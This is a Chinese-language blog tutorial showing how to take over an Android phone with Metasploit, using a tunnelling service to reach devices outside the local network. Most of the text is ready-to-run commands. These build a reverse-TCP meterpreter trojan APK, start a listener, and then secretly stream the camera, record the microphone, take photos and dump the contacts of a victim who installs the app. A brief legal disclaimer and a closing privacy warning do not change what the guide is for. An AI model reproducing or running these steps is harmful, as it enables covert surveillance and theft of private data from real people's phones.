通过Metasploit+小米球实现内网穿透入侵安卓手机
一. 前言:
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
实验目的:演示如何使用Kali里的Metasploit控制安卓手机
内网穿透原理:内网穿透相当于先将数据发给服务器,然后由服务器发给内网中的我们
二. 环境准备
注:具体下载和使用方法我就不讲了,百度上都有,讲起来太长了
1.kali linux(攻击方)
2.Ngrok(小米球)
下载linux版本并注册一个帐号来开通一个免费的隧道,用于接下来的端口映射
3.安卓模拟器(因为博主没有安卓手机,所以用模拟器)
注:比较推荐用模拟器,因为这个漏洞挺久远的,所以不支持高版本的手机,目前我测试了7.0以上好像是不行的(至少我没成功,有成功的欢迎来教教我),靶机我用的是版本为5.1的安卓
三. 开始实验
1. 启动内网穿透工具Ngrok
命令: ./xiaomiqiu_start.sh(在xiaomiqiu文件右击在此打开终端并输入此命令)
2.查看kali的ip
命令:ifconfig
3. 用Metasploit生成载有恶意Payload的Android的apk
命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk
解释: lhost=192.168.121.128 (这是Kali的IP)lport=8080 (默认4444,可以自定义,这里要与Ngrok的相同)
4. 启动msfconsole,设置模块
命令1:msfconsole
命令2:use exploit/multi/handler
5. 设置payload和监听
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.121.128 //这里的地址设置成我们刚才生成木马的IP地址
set lport 8080 //这里的端口设置成刚才我们生成木马所监听的端口
6. 检查配置是否正确
命令:options
四.攻击
1. 入侵
命令:exploit或者run
这个时候就监听就开启了,然后使用手机安装刚才生成的病毒文件(拉文件就不用演示了吧)
2. 此时手动点击刚才手机中安装的MainActivity
程序图标(没有界面)
3.当受害者点击以后便可成功建立攻击会话
五. 攻击命令
1.开启摄像头并录像
命令:webcam_stream
2.查看手机系统信息
命令:sysinfo
3.导出手机通讯录
命令:dump_contacts
4.调用摄像头拍照
命令:webcam_snap
5.录制声音
命令: record_mic
6.成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作
至此,本次演示结束,其他一些命令我就不一一演示了,有兴趣的话可自行借助help命令或者?给出的使用命令描述进行体验。
温馨提示:请不要随便安装陌生人的软件,可能会泄露自己的隐私!